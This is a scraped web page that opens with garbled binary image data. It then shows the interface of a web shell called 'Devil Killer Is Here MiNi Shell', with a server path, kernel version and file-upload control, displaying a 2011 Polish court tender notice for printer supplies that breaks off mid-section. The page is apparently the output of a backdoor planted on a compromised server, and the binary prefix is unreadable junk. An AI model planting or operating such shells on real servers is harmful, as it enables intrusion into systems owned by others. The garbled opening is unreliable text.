JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110218/24810-N-2011.html

<p class="kh_header"><b>Myszków: Dostawa materiałów eksploatacyjnych do drukarek, kopiarek, faxów i urządzenia wielofunkcyjnego dla Sądu Rejonowego w Myszkowie przy ul. Kwiatkowskiego 2, nr zamówienia 1/SRM/2011</b><br>
<b>Numer ogłoszenia: 24810 - 2011; data zamieszczenia: 18.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Myszkowie , ul. Kwiatkowskiego 2, 42-300 Myszków, woj. śląskie, tel. (034) 315-98-15, faks (034)315-98-95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myszkow.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, kopiarek, faxów i urządzenia wielofunkcyjnego dla Sądu Rejonowego w Myszkowie przy ul. Kwiatkowskiego 2, nr zamówienia 1/SRM/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, kopiarek, faxów i urządzenia wielofunkcyjnego dla Sądu Rejonowego w Myszkowie ul. Kwiatkowskiego 2, nr zamówienia 1/SRM/2011 w okresie od dnia podpisania umowy do 31.12.2011 r., realizowana dwa razy w roku, bądź częściej w przypadku uzupełnienia braków materiałów eksploatacyjnych, opisana w załączniku nr 1 do SIWZ. Wszystkie elementy produktu muszą być fabrycznie nowe, oryginalne - Pod pojęciem fabrycznie nowe  Zamawiający rozumie produkty wykonane z nowych elementów wcześniej nie używanych, nie regenerowanych, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z oznaczonym logo, symbolem produktu i terminem przydatności do użytku. Przez materiały oryginalne Zamawiający rozumie materiały eksploatacyjne wyprodukowane przez producenta urządzenia (sprzętu biurowego), do którego materiały są przeznaczone. Materiały nie mogą być regenerowane tj. poddane procesowi ponownego napełniania. Materiały nie mogą powodować utraty gwarancji producenta sprzętu. Materiały nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku wyspecjalizowanych w warunkach technicznych producenta sprzętu. Materiały nie mogą ograniczać pełnej współpracy z programem drukarki monitorującym stan zasobników z tonerem. Materiały winny posiadać na opakowaniu indywidualny kod materiału eksploatacyjnego oraz nazwę sprzętu do którego jest przeznaczony. Materiały winny posiadać na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację producenta. Materiały nie mogą powodować uszkodzeń urządzeń, w których będą eksploatowane. Szczegółowy opis przedmiotu zamówienia, jego wielkość i zakres stanowi załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających w wysokości nie więcej niż 20% wartości zamówienia podstawowego (art. 67 ust. 1 pkt 7 Prawo zamówień publicznych)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.19.21.13-6, 30.19.23.00-4, 30.19.28.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 2 000,00 złotych, które należy wnieść na rachunek: 
      BGK O/ KATOWICE  66 1130 1091 0003 9087 8720 0001. 
      Jeśli wadium nie znajdzie się na wskazanym rachunku do chwili otwarcia ofert - Zamawiający uzna, iż oferta nie została zabezpieczona wadium (nie dotyczy wadium wnoszonego w formie innej niż pieniężna).
2.	Wniesienie wadium w innej formie niż pieniężna winno być stwierdzone dokumentem załączonym do oferty w oryginale.
3.	Wadium musi obejmować okres związania ofertą.
4.	Termin wniesienia wadium upływa dnia 27.02.2011 r. o godz. 10.00. Oznacza to, że na koncie Zamawiającego muszą znaleźć się pieniądze lub inne formy wadium w miejscu składania ofert.
5.	Wadium może być wnoszone :
a) w pieniądzu - przelewem na rachunek Zamawiającego:
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy
    oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze 
    poręczeniem pieniężnym,
c) w gwarancjach bankowych - bezwarunkowych, nieodwołalnych, płatnych na
    pierwsze żądanie,
d) w gwarancjach ubezpieczeniowych - bezwarunkowych, nieodwołalnych,
    płatnych na pierwsze żądanie,
e) w poręczeniach  udzielanych przez podmioty, o których mowa w art. 6b ust. 5
   pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji
   Rozwoju Przedsiębiorczości (Dz.U. z 2007 roku, Nr 42, poz. 275).
6.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o którym mowa w art. 25 ust.1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
7.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków wymienionych w pkt VI ppkt 1-4
specyfikacji na podstawie złożonego oświadczenia o spełnianiu warunków udziału - załącznik nr 1 do oferty 1/SRM/2011. Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców
            będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia, w oparciu o
            informacje zawarte w oświadczeniach, o których mowa w pkt VII ppkt 1 SIWZ
            i  pisemnym zobowiązaniu wyszczególnionym w innych dokumentach ppkt 3
            SIWZ, dołączonych do oferty. 
            Z treści załączonych oświadczeń lub dokumentów w sposób jednoznaczny musi 
wynikać, iż Wykonawca spełnia wymienione warunki. 
W wyznaczonym przez Zamawiającego terminie, po otwarciu ofert, możliwe będzie uzupełnienie  wymaganych oświadczeń lub dokumentów, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
W przypadku wątpliwości co do oświadczeń lub dokumentów złożonych przez Wykonawcę, na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków wymienionych w pkt VI ppkt 1-4
specyfikacji na podstawie złożonego oświadczenia o spełnianiu warunków udziału - załącznik nr 1 do oferty 1/SRM/2011.

Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż
będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia. 
            Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców
            będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia, w oparciu o
            informacje zawarte w oświadczeniach, o których mowa w pkt VII ppkt 1 SIWZ
            i  pisemnym zobowiązaniu wyszczególnionym w innych dokumentach ppkt 3
            SIWZ, dołączonych do oferty. 
            Z treści załączonych oświadczeń lub dokumentów w sposób jednoznaczny musi 
wynikać, iż Wykonawca spełnia wymienione warunki. 
W wyznaczonym przez Zamawiającego terminie, po otwarciu ofert, możliwe będzie uzupełnienie  wymaganych oświadczeń lub dokumentów, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
W przypadku wątpliwości co do oświadczeń lub dokumentów złożonych przez Wykonawcę, na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków wymienionych w pkt VI ppkt 1-4
specyfikacji na podstawie złożonego oświadczenia o spełnianiu warunków udziału - załącznik nr 1 do oferty 1/SRM/2011.

Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż
będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia. 
            Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców
            będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia, w oparciu o
            informacje zawarte w oświadczeniach, o których mowa w pkt VII ppkt 1 SIWZ
            i  pisemnym zobowiązaniu wyszczególnionym w innych dokumentach ppkt 3
            SIWZ, dołączonych do oferty. 
            Z treści załączonych oświadczeń lub dokumentów w sposób jednoznaczny musi 
wynikać, iż Wykonawca spełnia wymienione warunki. 
W wyznaczonym przez Zamawiającego terminie, po otwarciu ofert, możliwe będzie uzupełnienie  wymaganych oświadczeń lub dokumentów, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
W przypadku wątpliwości co do oświadczeń lub dokumentów złożonych przez Wykonawcę, na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków wymienionych w pkt VI ppkt 1-4
specyfikacji na podstawie złożonego oświadczenia o spełnianiu warunków udziału - załącznik nr 1 do oferty 1/SRM/2011.

Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż
będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia. 
            Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców
            będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia, w oparciu o
            informacje zawarte w oświadczeniach, o których mowa w pkt VII ppkt 1 SIWZ
            i  pisemnym zobowiązaniu wyszczególnionym w innych dokumentach ppkt 3
            SIWZ, dołączonych do oferty. 
            Z treści załączonych oświadczeń lub dokumentów w sposób jednoznaczny musi 
wynikać, iż Wykonawca spełnia wymienione warunki. 
W wyznaczonym przez Zamawiającego terminie, po otwarciu ofert, możliwe będzie uzupełnienie  wymaganych oświadczeń lub dokumentów, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
W przypadku wątpliwości co do oświadczeń lub dokumentów złożonych przez Wykonawcę, na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków wymienionych w pkt VI ppkt 1-4
specyfikacji na podstawie złożonego oświadczenia o spełnianiu warunków udziału - załącznik nr 1 do oferty 1/SRM/2011.

Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż
będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia. 
            Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców
            będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia, w oparciu o
            informacje zawarte w oświadczeniach, o których mowa w pkt VII ppkt 1 SIWZ
            i  pisemnym zobowiązaniu wyszczególnionym w innych dokumentach ppkt 3
            SIWZ, dołączonych do oferty. 
            Z treści załączonych oświadczeń lub dokumentów w sposób jednoznaczny musi 
wynikać, iż Wykonawca spełnia wymienione warunki. 
W wyznaczonym przez Zamawiającego terminie, po otwarciu ofert, możliwe będzie uzupełnienie  wymaganych oświadczeń lub dokumentów, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
W przypadku wątpliwości co do oświadczeń lub dokumentów złożonych przez Wykonawcę, na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału - załacznik nr 1 do oferty 1/SRM/2011, projekt umowy - załącznik nr 3 do oferty 1/SRM/2011, pisemne umocowanie do występowania w postępowaniu dla osoby, której prawo do reprezentacji Wykonawcy nie wynika z właściwego rejestru lub wpisu do ewidencji działalności gospodarczej, udzielone zgodnie z zasadami reprezentacji Wykonawcy. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli Wykonawców, upoważniające pełnomocnika do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa winien zostać złożony w oryginale. Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Na zasadzie art. 26 ust. 2b ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późń. zm.) załącznikiem do oferty przy spełnieniu przesłanki opisanej powyżej jest pisemne zobowiązanie tych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełniania warunku udziału w postępowaniu wymagana od wykonawców będzie dokonana przez Zamawiającego wg formuły spełnia/nie spełnia w oparciu o informacje zawarte w przedłożonym dokumencie. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia 

W przypadku gdy Wykonawcy ubiegają się wspólnie o udzielenie zamówienia, ich oferta musi spełniać następujące wymagania:

1)	Wykonawcy muszą dołączyć do oferty pełnomocnictwo udzielone do
      reprezentowania w postępowaniu albo do reprezentowania i zawarcia umowy w
      sprawie zamówienia publicznego. Pełnomocnictwo winno zostać podpisane
      zgodnie z zasadami reprezentacji Wykonawców występujących wspólnie.
2)	każdy z Wykonawców występujących wspólnie ma obowiązek odrębnie 
      oświadczyć, że spełnia warunki udziału w postępowaniu oraz  nie podlega
      wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z
      postępowania, określonych w art. 24 Prawa zamówień publicznych - wzór   
      oświadczeń jest załącznikiem nr 1 i 2 do oferty 1/SRM/2011,
3)	każdy z Wykonawców występujących wspólnie ma obowiązek odrębnie złożyć
      dokumenty wyszczególnione w części VII SIWZ inne dokumenty pkt 2, 
4)   wypełniając formularz ofertowy, jak również pozostałe dokumenty powołujące się
       na Wykonawcę w miejscu np. nazwa i adres Wykonawcy należy wpisać dane
      dotyczące Wykonawców ubiegających się wspólnie o udzielenie zamówienia, a
       nie dane pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
